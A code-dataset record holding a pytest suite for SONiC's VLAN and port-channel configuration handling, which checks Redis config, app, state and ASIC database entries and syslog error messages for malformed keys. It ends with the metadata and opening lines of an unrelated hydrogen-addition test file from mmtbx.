2019-07-16T03:36:44.000Z
|
2019-07-17T02:15:37.000Z
|
from swsscommon import swsscommon
import time
import re
import json
import pytest
import platform
from distutils.version import StrictVersion
class TestVlan(object):
def setup_db(self, dvs):
self.pdb = swsscommon.DBConnector(0, dvs.redis_sock, 0)
self.adb = swsscommon.DBConnector(1, dvs.redis_sock, 0)
self.cdb = swsscommon.DBConnector(4, dvs.redis_sock, 0)
self.sdb = swsscommon.DBConnector(6, dvs.redis_sock, 0)
def create_vlan(self, vlan):
tbl = swsscommon.Table(self.cdb, "VLAN")
fvs = swsscommon.FieldValuePairs([("vlanid", vlan)])
tbl.set("Vlan" + vlan, fvs)
time.sleep(1)
def remove_vlan(self, vlan):
tbl = swsscommon.Table(self.cdb, "VLAN")
tbl._del("Vlan" + vlan)
time.sleep(1)
def create_vlan_member(self, vlan, interface, tagging_mode="untagged"):
tbl = swsscommon.Table(self.cdb, "VLAN_MEMBER")
fvs = swsscommon.FieldValuePairs([("tagging_mode", tagging_mode)])
tbl.set("Vlan" + vlan + "|" + interface, fvs)
time.sleep(1)
def remove_vlan_member(self, vlan, interface):
tbl = swsscommon.Table(self.cdb, "VLAN_MEMBER")
tbl._del("Vlan" + vlan + "|" + interface)
time.sleep(1)
def create_port_channel(self, dvs, channel, admin_status="up", mtu="1500"):
tbl = swsscommon.ProducerStateTable(self.pdb, "LAG_TABLE")
fvs = swsscommon.FieldValuePairs([("admin", admin_status), ("mtu", mtu)])
tbl.set("PortChannel" + channel, fvs)
dvs.runcmd("ip link add PortChannel" + channel + " type bond")
tbl = swsscommon.Table(self.sdb, "LAG_TABLE")
fvs = swsscommon.FieldValuePairs([("state", "ok")])
tbl.set("PortChannel" + channel, fvs)
time.sleep(1)
def remove_port_channel(self, dvs, channel):
tbl = swsscommon.ProducerStateTable(self.pdb, "LAG_TABLE")
tbl._del("PortChannel" + channel)
dvs.runcmd("ip link del PortChannel" + channel)
tbl = swsscommon.Table(self.sdb, "LAG_TABLE")
tbl._del("PortChannel" + channel)
time.sleep(1)
def create_port_channel_member(self, channel, interface, status="enabled"):
tbl = swsscommon.ProducerStateTable(self.pdb, "LAG_MEMBER_TABLE")
fvs = swsscommon.FieldValuePairs([("status", status)])
tbl.set("PortChannel" + channel + ":" + interface, fvs)
time.sleep(1)
def remove_port_channel_member(self, channel, interface):
tbl = swsscommon.ProducerStateTable(self.pdb, "LAG_MEMBER_TABLE")
tbl._del("PortChannel" + channel + ":" + interface)
time.sleep(1)
def check_syslog(self, dvs, marker, process, err_log, vlan_str, expected_cnt):
(exitcode, num) = dvs.runcmd(['sh', '-c', "awk \'/%s/,ENDFILE {print;}\' /var/log/syslog | grep %s | grep \"%s\" | grep -i \"%s\" | wc -l" % (marker, process, err_log, vlan_str)])
assert num.strip() == str(expected_cnt)
def check_app_db_vlan_fields(self, fvs, admin_status="up", mtu="9100"):
for fv in fvs:
if fv[0] == "admin_status":
assert fv[1] == admin_status
elif fv[0] == "mtu":
assert fv[1] == mtu
def check_app_db_vlan_member_fields(self, fvs, tagging_mode="untagged"):
for fv in fvs:
if fv[0] == "tagging_mode":
assert fv[1] == tagging_mode
def check_state_db_vlan_fields(self, fvs, state="ok"):
for fv in fvs:
if fv[0] == "state":
assert fv[1] == state
def check_state_db_vlan_member_fields(self, fvs, state="ok"):
for fv in fvs:
if fv[0] == "state":
assert fv[1] == state
def test_VlanAddRemove(self, dvs, testlog):
dvs.setup_db()
# create vlan
dvs.create_vlan("2")
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 1
vlan_oid = vlan_entries[0]
(status, fvs) = tbl.get(vlan_oid)
assert status == True
for fv in fvs:
if fv[0] == "SAI_VLAN_ATTR_VLAN_ID":
assert fv[1] == "2"
# create vlan member
dvs.create_vlan_member("2", "Ethernet0")
# check asic database
bridge_port_map = {}
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_BRIDGE_PORT")
bridge_port_entries = tbl.getKeys()
for key in bridge_port_entries:
(status, fvs) = tbl.get(key)
assert status == True
for fv in fvs:
if fv[0] == "SAI_BRIDGE_PORT_ATTR_PORT_ID":
bridge_port_map[key] = fv[1]
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 1
(status, fvs) = tbl.get(vlan_member_entries[0])
assert status == True
assert len(fvs) == 3
for fv in fvs:
if fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_TAGGING_MODE":
assert fv[1] == "SAI_VLAN_TAGGING_MODE_UNTAGGED"
elif fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_ID":
assert fv[1] == vlan_oid
elif fv[0] == "SAI_VLAN_MEMBER_ATTR_BRIDGE_PORT_ID":
assert dvs.asicdb.portoidmap[bridge_port_map[fv[1]]] == "Ethernet0"
else:
assert False
# check port pvid
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_PORT")
(status, fvs) = tbl.get(dvs.asicdb.portnamemap["Ethernet0"])
assert status == True
assert "SAI_PORT_ATTR_PORT_VLAN_ID" in [fv[0] for fv in fvs]
for fv in fvs:
if fv[0] == "SAI_PORT_ATTR_PORT_VLAN_ID":
assert fv[1] == "2"
# check host interface vlan tag
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_HOSTIF")
(status, fvs) = tbl.get(dvs.asicdb.hostifnamemap["Ethernet0"])
assert status == True
assert "SAI_HOSTIF_ATTR_VLAN_TAG" in [fv[0] for fv in fvs]
for fv in fvs:
if fv[0] == "SAI_HOSTIF_ATTR_VLAN_TAG":
assert fv[1] == "SAI_HOSTIF_VLAN_TAG_KEEP"
# remove vlan member
dvs.remove_vlan_member("2", "Ethernet0")
# remove vlan
dvs.remove_vlan("2")
def test_MultipleVlan(self, dvs, testlog):
return
dvs.setup_db()
# create vlan and vlan members
dvs.create_vlan("18")
dvs.create_vlan_member("18", "Ethernet0")
dvs.create_vlan_member("18", "Ethernet4")
dvs.create_vlan_member("18", "Ethernet8")
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 1
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 3
# remove vlan members
dvs.remove_vlan_member("18", "Ethernet0")
dvs.remove_vlan_member("18", "Ethernet4")
dvs.remove_vlan_member("18", "Ethernet8")
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 0
# create vlan and vlan members
dvs.create_vlan("188")
dvs.create_vlan_member("188", "Ethernet20")
dvs.create_vlan_member("188", "Ethernet24")
dvs.create_vlan_member("188", "Ethernet28")
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 2
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 3
# create vlan members
dvs.create_vlan_member("18", "Ethernet40")
dvs.create_vlan_member("18", "Ethernet44")
dvs.create_vlan_member("18", "Ethernet48")
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 6
# remove vlan members
dvs.remove_vlan_member("18", "Ethernet40")
dvs.remove_vlan_member("18", "Ethernet44")
dvs.remove_vlan_member("18", "Ethernet48")
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 3
# remove vlan members
dvs.remove_vlan_member("188", "Ethernet20")
dvs.remove_vlan_member("188", "Ethernet24")
dvs.remove_vlan_member("188", "Ethernet28")
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 0
# member ports should have been detached from bridge master properly
exitcode, output = dvs.runcmd(['sh', '-c', "ip link show Ethernet20 | grep -w master"])
assert exitcode != 0
exitcode, output = dvs.runcmd(['sh', '-c', "ip link show Ethernet24 | grep -w master"])
assert exitcode != 0
exitcode, output = dvs.runcmd(['sh', '-c', "ip link show Ethernet28 | grep -w master"])
assert exitcode != 0
# remove vlans
dvs.remove_vlan("18")
dvs.remove_vlan("188")
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 0
def test_VlanIncrementalConfig(self, dvs, testlog):
dvs.setup_db()
# create vlan
dvs.create_vlan("2")
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 1
vlan_oid = vlan_entries[0]
(status, fvs) = tbl.get(vlan_oid)
assert status == True
for fv in fvs:
if fv[0] == "SAI_VLAN_ATTR_VLAN_ID":
assert fv[1] == "2"
# create vlan member
dvs.create_vlan_member("2", "Ethernet0")
# check asic database
bridge_port_map = {}
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_BRIDGE_PORT")
bridge_port_entries = tbl.getKeys()
for key in bridge_port_entries:
(status, fvs) = tbl.get(key)
assert status == True
for fv in fvs:
if fv[0] == "SAI_BRIDGE_PORT_ATTR_PORT_ID":
bridge_port_map[key] = fv[1]
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 1
(status, fvs) = tbl.get(vlan_member_entries[0])
assert status == True
assert len(fvs) == 3
for fv in fvs:
if fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_TAGGING_MODE":
assert fv[1] == "SAI_VLAN_TAGGING_MODE_UNTAGGED"
elif fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_ID":
assert fv[1] == vlan_oid
elif fv[0] == "SAI_VLAN_MEMBER_ATTR_BRIDGE_PORT_ID":
assert dvs.asicdb.portoidmap[bridge_port_map[fv[1]]] == "Ethernet0"
else:
assert False
# assign IP to interface
dvs.add_ip_address("Vlan2", "20.0.0.8/29")
# check ASIC router interface database for mtu changes.
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_ROUTER_INTERFACE")
intf_entries = tbl.getKeys()
# one loopback router interface one vlan based router interface
assert len(intf_entries) == 2
for key in intf_entries:
(status, fvs) = tbl.get(key)
assert status == True
# a Vlan based router interface has five field/value tuples
if len(fvs) == 5:
for fv in fvs:
if fv[0] == "SAI_ROUTER_INTERFACE_ATTR_TYPE":
assert fv[1] == "SAI_ROUTER_INTERFACE_TYPE_VLAN"
# assert the default value 9100 for the router interface
if fv[0] == "SAI_ROUTER_INTERFACE_ATTR_MTU":
assert fv[1] == "9100"
# configure MTU to interface
dvs.set_mtu("Vlan2", "8888")
intf_entries = tbl.getKeys()
for key in intf_entries:
(status, fvs) = tbl.get(key)
assert status == True
# a Vlan based router interface has five field/value tuples
if len(fvs) == 5:
for fv in fvs:
if fv[0] == "SAI_ROUTER_INTERFACE_ATTR_TYPE":
assert fv[1] == "SAI_ROUTER_INTERFACE_TYPE_VLAN"
# assert the new value set to the router interface
if fv[0] == "SAI_ROUTER_INTERFACE_ATTR_MTU":
assert fv[1] == "8888"
# check appDB for VLAN admin_status change.
tbl = swsscommon.Table(dvs.pdb, "VLAN_TABLE")
dvs.set_interface_status("Vlan2", "down")
(status, fvs) = tbl.get("Vlan2")
assert status == True
for fv in fvs:
if fv[0] == "admin_status":
assert fv[1] == "down"
dvs.set_interface_status("Vlan2", "up")
(status, fvs) = tbl.get("Vlan2")
assert status == True
for fv in fvs:
if fv[0] == "admin_status":
assert fv[1] == "up"
# remove IP from interface
dvs.remove_ip_address("Vlan2", "20.0.0.8/29")
# remove vlan member
dvs.remove_vlan_member("2", "Ethernet0")
# remove vlan
dvs.remove_vlan("2")
@pytest.mark.skipif(StrictVersion(platform.linux_distribution()[1]) <= StrictVersion('8.9'), reason="Debian 8.9 or before has no support")
@pytest.mark.parametrize("test_input, expected", [
(["Vla", "2"], 0),
(["VLAN", "3"], 0),
(["vlan", "4"], 0),
(["Vlan", "5"], 1),
])
def test_AddVlanWithIncorrectKeyPrefix(self, dvs, testlog, test_input, expected):
dvs.setup_db()
marker = dvs.add_log_marker()
vlan_prefix = test_input[0]
vlan = test_input[1]
# create vlan
tbl = swsscommon.Table(dvs.cdb, "VLAN")
fvs = swsscommon.FieldValuePairs([("vlanid", vlan)])
tbl.set(vlan_prefix + vlan, fvs)
time.sleep(1)
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == expected
if len(vlan_entries) == 0:
# check error log
self.check_syslog(dvs, marker, "vlanmgrd", "Invalid key format. No 'Vlan' prefix:", vlan_prefix+vlan, 1)
else:
#remove vlan
dvs.remove_vlan(vlan)
@pytest.mark.skipif(StrictVersion(platform.linux_distribution()[1]) <= StrictVersion('8.9'), reason="Debian 8.9 or before has no support")
@pytest.mark.parametrize("test_input, expected", [
(["Vlan", "abc"], 0),
(["Vlan", "a3"], 0),
(["Vlan", ""], 0),
(["Vlan", "5"], 1),
])
def test_AddVlanWithIncorrectValueType(self, dvs, testlog, test_input, expected):
dvs.setup_db()
marker = dvs.add_log_marker()
vlan_prefix = test_input[0]
vlan = test_input[1]
# create vlan
tbl = swsscommon.Table(dvs.cdb, "VLAN")
fvs = swsscommon.FieldValuePairs([("vlanid", vlan)])
tbl.set(vlan_prefix + vlan, fvs)
time.sleep(1)
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == expected
if len(vlan_entries) == 0:
# check error log
self.check_syslog(dvs, marker, "vlanmgrd", "Invalid key format. Not a number after \'Vlan\' prefix:", vlan_prefix+vlan, 1)
else:
#remove vlan
dvs.remove_vlan(vlan)
def test_AddPortChannelToVlan(self, dvs, testlog):
self.setup_db(dvs)
marker = dvs.add_log_marker()
vlan = "2"
channel = "001"
# create port channel
self.create_port_channel(dvs, channel)
# check asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_LAG")
lag_entries = tbl.getKeys()
assert len(lag_entries) == 1
# add port channel member
self.create_port_channel_member(channel, "Ethernet0")
# check asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_LAG_MEMBER")
lag_member_entries = tbl.getKeys()
assert len(lag_member_entries) == 1
(status, fvs) = tbl.get(lag_member_entries[0])
for fv in fvs:
if fv[0] == "SAI_LAG_MEMBER_ATTR_LAG_ID":
assert fv[1] == lag_entries[0]
elif fv[0] == "SAI_LAG_MEMBER_ATTR_PORT_ID":
assert dvs.asicdb.portoidmap[fv[1]] == "Ethernet0"
else:
assert False
# create vlan
self.create_vlan(vlan)
# check asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 1
# create vlan member
self.create_vlan_member(vlan, "PortChannel" + channel, "tagged")
# check asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 1
# remove vlan member
self.remove_vlan_member(vlan, "PortChannel" + channel)
# check asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 0
# remove vlan
self.remove_vlan(vlan)
# check asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 0
# remove trunk member
self.remove_port_channel_member(channel, "Ethernet0")
# check asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_LAG_MEMBER")
lag_member_entries = tbl.getKeys()
assert len(lag_member_entries) == 0
# remove trunk
self.remove_port_channel(dvs, channel)
# check asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_LAG")
lag_entries = tbl.getKeys()
assert len(lag_entries) == 0
def test_AddVlanMemberWithNonExistVlan(self, dvs, testlog):
dvs.setup_db()
marker = dvs.add_log_marker()
vlan = "2"
# create vlan member
dvs.create_vlan_member(vlan, "Ethernet0")
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 0
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 0
# remove vlan member from cfgdb
dvs.remove_vlan_member(vlan, "Ethernet0")
def test_RemoveNonexistentVlan(self, dvs, testlog):
dvs.setup_db()
marker = dvs.add_log_marker()
vlan = "2"
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 0
# remove nonexistent vlan
dvs.remove_vlan(vlan)
# create vlan
dvs.create_vlan(vlan)
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 1
# remove vlan
dvs.remove_vlan(vlan)
@pytest.mark.skipif(StrictVersion(platform.linux_distribution()[1]) <= StrictVersion('8.9'), reason="Debian 8.9 or before has no support")
@pytest.mark.parametrize("test_input, expected", [
(["tagging_mode", "untagged"], [1, "SAI_VLAN_TAGGING_MODE_UNTAGGED"]),
(["tagging_mode", "tagged"], [1, "SAI_VLAN_TAGGING_MODE_TAGGED"]),
(["tagging_mode", "priority_tagged"], [1, "SAI_VLAN_TAGGING_MODE_PRIORITY_TAGGED"]),
(["tagging_mode", "unexpected_mode"], [0, ""]),
(["no_tag_mode", ""], [1, "SAI_VLAN_TAGGING_MODE_UNTAGGED"]),
])
def test_VlanMemberTaggingMode(self, dvs, testlog, test_input, expected):
self.setup_db(dvs)
tagging_mode_prefix = test_input[0]
tagging_mode = test_input[1]
marker = dvs.add_log_marker()
vlan = "2"
# create vlan
self.create_vlan(vlan)
# check asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 1
vlan_oid = vlan_entries[0]
# add vlan member
tbl = swsscommon.Table(self.cdb, "VLAN_MEMBER")
fvs = swsscommon.FieldValuePairs([(tagging_mode_prefix, tagging_mode)])
tbl.set("Vlan" + vlan + "|" + "Ethernet0", fvs)
time.sleep(1)
# check asic database
bridge_port_map = {}
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_BRIDGE_PORT")
bridge_port_entries = tbl.getKeys()
for key in bridge_port_entries:
(status, fvs) = tbl.get(key)
assert status == True
for fv in fvs:
if fv[0] == "SAI_BRIDGE_PORT_ATTR_PORT_ID":
bridge_port_map[key] = fv[1]
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == expected[0]
if len(vlan_member_entries) == 1:
(status, fvs) = tbl.get(vlan_member_entries[0])
assert status == True
assert len(fvs) == 3
for fv in fvs:
if fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_TAGGING_MODE":
assert fv[1] == expected[1]
elif fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_ID":
assert fv[1] == vlan_oid
elif fv[0] == "SAI_VLAN_MEMBER_ATTR_BRIDGE_PORT_ID":
assert dvs.asicdb.portoidmap[bridge_port_map[fv[1]]] == "Ethernet0"
else:
assert False
else:
# check error log
self.check_syslog(dvs, marker, "vlanmgrd", "Wrong tagging_mode", test_input, 1)
# remove vlan member
self.remove_vlan_member(vlan, "Ethernet0")
# remove vlan
self.remove_vlan(vlan)
@pytest.mark.skip(reason="AddMaxVlan take too long to execute")
def test_AddMaxVlan(self, dvs, testlog):
dvs.setup_db()
min_vid = 2
max_vid = 4094
# create max vlan
vlan = min_vid
while vlan <= max_vid:
dvs.create_vlan(str(vlan))
vlan += 1
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == (4094-1)
# remove all vlan
vlan = min_vid
while vlan <= max_vid:
dvs.remove_vlan(str(vlan))
vlan += 1
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 0
def test_RemoveVlanWithRouterInterface(self, dvs, testlog):
dvs.setup_db()
marker = dvs.add_log_marker()
# create vlan
dvs.create_vlan("100")
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 1
vlan_oid = vlan_entries[0]
(status, fvs) = tbl.get(vlan_oid)
assert status == True
for fv in fvs:
if fv[0] == "SAI_VLAN_ATTR_VLAN_ID":
assert fv[1] == "100"
# assign IP to interface
dvs.add_ip_address("Vlan100", "20.0.0.8/29")
# check ASIC router interface database for mtu changes.
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_ROUTER_INTERFACE")
intf_entries = tbl.getKeys()
# one loopback router interface one vlan based router interface
assert len(intf_entries) == 2
# remove vlan
dvs.remove_vlan("100")
# check asic database still contains the vlan
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 1
vlan_oid = vlan_entries[0]
(status, fvs) = tbl.get(vlan_oid)
assert status == True
for fv in fvs:
if fv[0] == "SAI_VLAN_ATTR_VLAN_ID":
assert fv[1] == "100"
# remove IP from interface
dvs.remove_ip_address("Vlan100", "20.0.0.8/29")
# remove vlan
dvs.remove_vlan("100")
# check asic database does not contain the vlan anymore
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 0
def test_VlanDbData(self, dvs, testlog):
self.setup_db(dvs)
vlan = "2"
# create vlan
self.create_vlan(vlan)
# check app database
tbl = swsscommon.Table(self.pdb, "VLAN_TABLE")
vlan_entries = tbl.getKeys()
assert len(vlan_entries) == 1
vlan_oid = vlan_entries[0]
(status, fvs) = tbl.get(vlan_oid)
self.check_app_db_vlan_fields(fvs)
# check state database
tbl = swsscommon.Table(self.sdb, "VLAN_TABLE")
vlan_entries = tbl.getKeys()
assert len(vlan_entries) == 1
vlan_oid = vlan_entries[0]
(status, fvs) = tbl.get(vlan_oid)
self.check_state_db_vlan_fields(fvs)
# check asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 1
vlan_oid = vlan_entries[0]
(status, fvs) = tbl.get(vlan_oid)
assert status == True
for fv in fvs:
if fv[0] == "SAI_VLAN_ATTR_VLAN_ID":
assert fv[1] == vlan
# remove vlan
self.remove_vlan(vlan)
@pytest.mark.skipif(StrictVersion(platform.linux_distribution()[1]) <= StrictVersion('8.9'), reason="Debian 8.9 or before has no support")
@pytest.mark.parametrize("test_input, expected", [
(["untagged"], ["SAI_VLAN_TAGGING_MODE_UNTAGGED"]),
(["tagged"], ["SAI_VLAN_TAGGING_MODE_TAGGED"]),
(["priority_tagged"], ["SAI_VLAN_TAGGING_MODE_PRIORITY_TAGGED"]),
])
def test_VlanMemberDbData(self, dvs, testlog, test_input, expected):
self.setup_db(dvs)
vlan = "2"
interface = "Ethernet0"
tagging_mode = test_input[0]
# create vlan
self.create_vlan(vlan)
# check asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 1
vlan_oid = vlan_entries[0]
# create vlan member
self.create_vlan_member(vlan, interface, tagging_mode)
# check app database
tbl = swsscommon.Table(self.pdb, "VLAN_MEMBER_TABLE")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 1
vlan_member_oid = vlan_member_entries[0]
(status, fvs) = tbl.get(vlan_member_oid)
self.check_app_db_vlan_member_fields(fvs, tagging_mode)
# check state database
tbl = swsscommon.Table(self.sdb, "VLAN_MEMBER_TABLE")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 1
vlan_member_oid = vlan_member_entries[0]
(status, fvs) = tbl.get(vlan_member_oid)
self.check_state_db_vlan_member_fields(fvs)
# check asic database
bridge_port_map = {}
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_BRIDGE_PORT")
bridge_port_entries = tbl.getKeys()
for key in bridge_port_entries:
(status, fvs) = tbl.get(key)
assert status == True
for fv in fvs:
if fv[0] == "SAI_BRIDGE_PORT_ATTR_PORT_ID":
bridge_port_map[key] = fv[1]
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 1
(status, fvs) = tbl.get(vlan_member_entries[0])
assert status == True
assert len(fvs) == 3
for fv in fvs:
if fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_TAGGING_MODE":
assert fv[1] == expected[0]
elif fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_ID":
assert fv[1] == vlan_oid
elif fv[0] == "SAI_VLAN_MEMBER_ATTR_BRIDGE_PORT_ID":
assert dvs.asicdb.portoidmap[bridge_port_map[fv[1]]] == interface
else:
assert False
# remove vlan member
self.remove_vlan_member(vlan, interface)
# remove vlan
self.remove_vlan(vlan)
| 37.984049
| 187
| 0.604096
|
4a02050f65843d9f8b08dd0dab52ae3b370d4ef9
| 37,764
|
py
|
Python
|
mmtbx/hydrogens/tst_add_hydrogen_2.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 155
|
2016-11-23T12:52:16.000Z
|
2022-03-31T15:35:44.000Z
|
mmtbx/hydrogens/tst_add_hydrogen_2.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 590
|
2016-12-10T11:31:18.000Z
|
2022-03-30T23:10:09.000Z
|
mmtbx/hydrogens/tst_add_hydrogen_2.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 115
|
2016-11-15T08:17:28.000Z
|
2022-02-09T15:30:14.000Z
|
from __future__ import absolute_import, division, print_function
import time
import mmtbx.model
import iotbx.pdb
from mmtbx.hydrogens import reduce_hydrogen
from libtbx.utils import null_out
from libtbx.test_utils import approx_equal
# ------------------------------------------------------------------------------
def run():
test_000()
test_001()
test_002()
test_003()
test_004()
test_005()
test_006()
test_007()
test_008()
test_009()
# ------------------------------------------------------------------------------
def compare_models(pdb_str,
contains = None,
not_contains = None):
#
pdb_inp = iotbx.pdb.input(lines=pdb_str.split("\n"), source_info=None)
# initial model
model_initial = mmtbx.model.manager(model_input = pdb_inp,
log = null_out())
hd_sel_initial = model_initial.get_hd_selection()
number_h_expected = hd_sel_initial.count(True)
ph_initial = model_initial.get_hierarchy()
h_atoms_initial = ph_initial.select(hd_sel_initial).atoms()
h_names_initial = list(h_atoms_initial.extract_name())
# remove H atoms
model_without_h = model_initial.select(~hd_sel_initial)
